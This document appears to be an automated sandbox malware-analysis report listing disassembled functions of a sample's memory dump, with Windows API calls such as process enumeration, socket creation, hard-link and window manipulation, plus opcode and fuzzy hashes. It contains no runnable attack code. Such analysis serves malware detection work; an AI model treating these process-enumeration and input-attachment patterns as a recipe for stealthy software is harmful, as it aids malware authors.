                                                              Function 00CE4116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CE419F
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CE41AF
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CE41D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 8f0a1c1c802dcc7453764d3db925d1ed885536d6c50073f03a3ad597dd34f518
                                                              • Instruction ID: 3260d9d53af962b7c982282fbbf1af37e0ac6e47fd2e79c0cacbba498b184bec
                                                              • Opcode Fuzzy Hash: 8f0a1c1c802dcc7453764d3db925d1ed885536d6c50073f03a3ad597dd34f518
                                                              • Instruction Fuzzy Hash: 9421FF32600258BBEF258F51DC84FEF376EEF99750F008124FA159B190CA719C9287A0
                                                              Function 00CE4B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CE4BAE
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CE4BC3
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CE4BD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: d41569f7a6e7a5a06c16fd19fe7482861caf44db233b1047ebc0f20bd7240d98
                                                              • Instruction ID: a6172d1a25071cac441d621ee5e216d65d89e0037febe9ae692bdb0011c89c84
                                                              • Opcode Fuzzy Hash: d41569f7a6e7a5a06c16fd19fe7482861caf44db233b1047ebc0f20bd7240d98
                                                              • Instruction Fuzzy Hash: CF110631240288BFEF215F66CC46FAB77A8EF85B54F110514FA65E60A0D671DC619B20
                                                              Function 00CE61E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CE6220
                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CE624D
                                                              • DrawMenuBar.USER32(?), ref: 00CE625C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$InfoItem$Draw
                                                              • String ID: 0
                                                              • API String ID: 3227129158-4108050209
                                                              • Opcode ID: bc75a5ec8e8d85a2898d77cefd11fbe7eb50fcdee8468a96a65f9068de4f8403
                                                              • Instruction ID: 0cfe19283be47a2e126c469a5a67feb9a34f7928fd5384f84c9aa3883d56dce4
                                                              • Opcode Fuzzy Hash: bc75a5ec8e8d85a2898d77cefd11fbe7eb50fcdee8468a96a65f9068de4f8403
                                                              • Instruction Fuzzy Hash: FD01CC72500288EFDB209F52CC88BAE7BB4FF44354F148099F94ADA151CB318A80EF20
                                                              Function 00CB090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4536ad2e74af828f4349fdfb0d10b5f8e5f53eb967efc46476f668805df0ba45
                                                              • Instruction ID: f199eacec9f98bd2b3f1bb859952d75ee43fdb33701c3058880a3fce0fbd07a9
                                                              • Opcode Fuzzy Hash: 4536ad2e74af828f4349fdfb0d10b5f8e5f53eb967efc46476f668805df0ba45
                                                              • Instruction Fuzzy Hash: 68C15C75A0020AEFDB14CF94C894EAEBBB5FF48704F208598E516EB251D731EE81DB90
                                                              Function 00C84210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                              • Instruction ID: 6a13e6c14afd97f0f3f030899f22bf32f4b07b99d084bc3b0479517e132a4dca
                                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                              • Instruction Fuzzy Hash: 7EA19B729003879FDB29EF18C881BBEBBE4EF91318F18416DE5959B291C3388E41C758
                                                              Function 00CB0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0E80
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0E98
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00CEDCE0,000000FF,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0EBD
                                                              • _memcmp.LIBVCRUNTIME ref: 00CB0EDE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID:
                                                              • API String ID: 314563124-0
                                                              • Opcode ID: 31e97ce99ecf880d9773d01c29a8df4b93ad44c1d5746069f03c6f516a53a6f1
                                                              • Instruction ID: de6e020e0df40caa1624ba38f37acecab9cfbbbfb0ae19f0ab1adbf89f0a5e9b
                                                              • Opcode Fuzzy Hash: 31e97ce99ecf880d9773d01c29a8df4b93ad44c1d5746069f03c6f516a53a6f1
                                                              • Instruction Fuzzy Hash: 5A812971A00109EFCB14DF94C988EEEB7B9FF89315F204598F516AB250DB71AE46CB60
                                                              Function 00CDAFDB Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00CDB00B
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00CDB019
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00CDB0FB
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CDB10A
                                                                • Part of subcall function 00C6E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C94D4D,?), ref: 00C6E30F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                              • String ID:
                                                              • API String ID: 1991900642-0
                                                              • Opcode ID: edd903012719550a6dfb66d57e63f665606708565cca856f0294376682399adf
                                                              • Instruction ID: 50c52ce101704cc6443f828099858884f6dbb12421e3247c394d06d17f50857d
                                                              • Opcode Fuzzy Hash: edd903012719550a6dfb66d57e63f665606708565cca856f0294376682399adf
                                                              • Instruction Fuzzy Hash: F15129B5508340AFC310EF24C886A6FBBE8BF88754F44491DF99997261EB70DD48DB92
                                                              Function 00CD2433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00CD245A
                                                              • WSAGetLastError.WSOCK32 ref: 00CD2468
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CD24E7
                                                              • WSAGetLastError.WSOCK32 ref: 00CD24F1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$socket
                                                              • String ID:
                                                              • API String ID: 1881357543-0
                                                              • Opcode ID: 22dab7883c5a1e47009f0e90f81bff9a43738485b5ace4b659e86254f2c47d70
                                                              • Instruction ID: e0d837c97dcda84e80527b5783a7d20bef6c2065a575abf3da49ac89c858c0ff
                                                              • Opcode Fuzzy Hash: 22dab7883c5a1e47009f0e90f81bff9a43738485b5ace4b659e86254f2c47d70
                                                              • Instruction Fuzzy Hash: F541A378600200AFE7209F24D896F2A77A5AF14718F588449FA1A9F3D3D672ED81DB90
                                                              Function 00CE6BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CE6C41
                                                              • ScreenToClient.USER32(?,?), ref: 00CE6C74
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CE6CE1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: 61849147dc750f27a208633b593d767c0b550b17193cc99ab219047f8795486c
                                                              • Instruction ID: 73c882d094b8c1e8cc40766b8224830f4c6beda7f6181b6d5d3ea68c18f1718a
                                                              • Opcode Fuzzy Hash: 61849147dc750f27a208633b593d767c0b550b17193cc99ab219047f8795486c
                                                              • Instruction Fuzzy Hash: 56512F74A10249EFCF24CF55C980AAE7BB5FF653A0F608159F8659B290D730AE81CF50
                                                              Function 00CC6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CC60DD
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC6103
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CC6128
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CC6154
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 39f2cb6bcaa017ee6e1999cd51059fc342e0a0174f57eebe37ca1be8cb8069b9
                                                              • Instruction ID: 48b99bb5f00fde80dcd8b5d5e25c8a02ff8fcde1cd786ee3a89c14895962b329
                                                              • Opcode Fuzzy Hash: 39f2cb6bcaa017ee6e1999cd51059fc342e0a0174f57eebe37ca1be8cb8069b9
                                                              • Instruction Fuzzy Hash: 9D414839600610DFCB11EF14C585A5EBBF2EF89321B098088EC5AAB362CB30FD45DB95
                                                              Function 00CE2039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00CE204A
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                              • GetCaretPos.USER32(?), ref: 00CE205E
                                                              • ClientToScreen.USER32(00000000,?), ref: 00CE20AB
                                                              • GetForegroundWindow.USER32 ref: 00CE20B1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 96bbfce4ee5a8e352d4ede75f57f5e0cfaa325313ab7842e4ce728158bbc2e8d
                                                              • Instruction ID: ecab7fbac5dd2ce72d55a9222cbf84fb74485f61fd98e5669038e34f312410a9
                                                              • Opcode Fuzzy Hash: 96bbfce4ee5a8e352d4ede75f57f5e0cfaa325313ab7842e4ce728158bbc2e8d
                                                              • Instruction Fuzzy Hash: BF313275D00149AFC704DFA6C881DAEB7FCEF58304B50846AE415E7252DB71DE45DBA0
                                                              Function 00CBE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C54154: _wcslen.LIBCMT ref: 00C54159
                                                              • _wcslen.LIBCMT ref: 00CBE7F7
                                                              • _wcslen.LIBCMT ref: 00CBE80E
                                                              • _wcslen.LIBCMT ref: 00CBE839
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00CBE844
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ExtentPoint32Text
                                                              • String ID:
                                                              • API String ID: 3763101759-0
                                                              • Opcode ID: 9620f9c29d176e564a5445c8038d1db339a4672e9f8b693ed3830649258b5da3
                                                              • Instruction ID: 04ca7996954a8d49997e5adb84e9d648a7a9f25820eb2e51c93e33e1f3800faa
                                                              • Opcode Fuzzy Hash: 9620f9c29d176e564a5445c8038d1db339a4672e9f8b693ed3830649258b5da3
                                                              • Instruction Fuzzy Hash: 8E21B572D00614AFCB11DFA8C981BEEB7F8EF45760F148065E818AB281D7709E41DBA1
                                                              Function 00CE30E1 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00CE3169
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CE3183
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CE3191
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CE319F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: faa1351589f018db3ed80b47fccacc5ae4f7620165225647b1021c06dbb7f9bf
                                                              • Instruction ID: 3e3bdb53907699b27225dbf881842f0feaf2c6ff7af3301a05b1d4f7c809285a
                                                              • Opcode Fuzzy Hash: faa1351589f018db3ed80b47fccacc5ae4f7620165225647b1021c06dbb7f9bf
                                                              • Instruction Fuzzy Hash: 5F21A1352085D1AFD7149B15CC88FAE7BA5AF85324F14815CF8668B2D2CB75FE82C790
                                                              Function 00CB8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CB960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?), ref: 00CB961B
                                                                • Part of subcall function 00CB960C: lstrcpyW.KERNEL32(00000000,?,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB9641
                                                                • Part of subcall function 00CB960C: lstrcmpiW.KERNEL32(00000000,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?), ref: 00CB9672
                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB81B2
                                                              • lstrcpyW.KERNEL32(00000000,?,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB81D8
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB8213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: c2cdf451ed0f7da915391ca6e6ed22a3bed9b69bfd7f23bd062a674c64e386fa
                                                              • Instruction ID: 1f282a67879441ea44e7a5bd1f4338a656c3141a7674426f20ff55dd3d376120
                                                              • Opcode Fuzzy Hash: c2cdf451ed0f7da915391ca6e6ed22a3bed9b69bfd7f23bd062a674c64e386fa
                                                              • Instruction Fuzzy Hash: D711D37A200341AFCB145F38D885ABE77A9FF99350F50402AF906CB260EF719905D7A1
                                                              Function 00CE8621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CE866A
                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CE8689
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CE86A1
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CCC10A,00000000), ref: 00CE86CA
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID:
                                                              • API String ID: 847901565-0
                                                              • Opcode ID: 55c2560e7d072b9c58647ddb0e9dde984e60893f04031c8e9815e8d1f8a03d05
                                                              • Instruction ID: 528a9aea75c8c09297969c22553a931eebe64fb8c7fdde6e5fafd0126da63f94
                                                              • Opcode Fuzzy Hash: 55c2560e7d072b9c58647ddb0e9dde984e60893f04031c8e9815e8d1f8a03d05
                                                              • Instruction Fuzzy Hash: C211AF31500295AFCB109F6ADC48B6A3BA9BB49374F114724F939DB2F0DB308A55DB90
                                                              Function 00C82099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
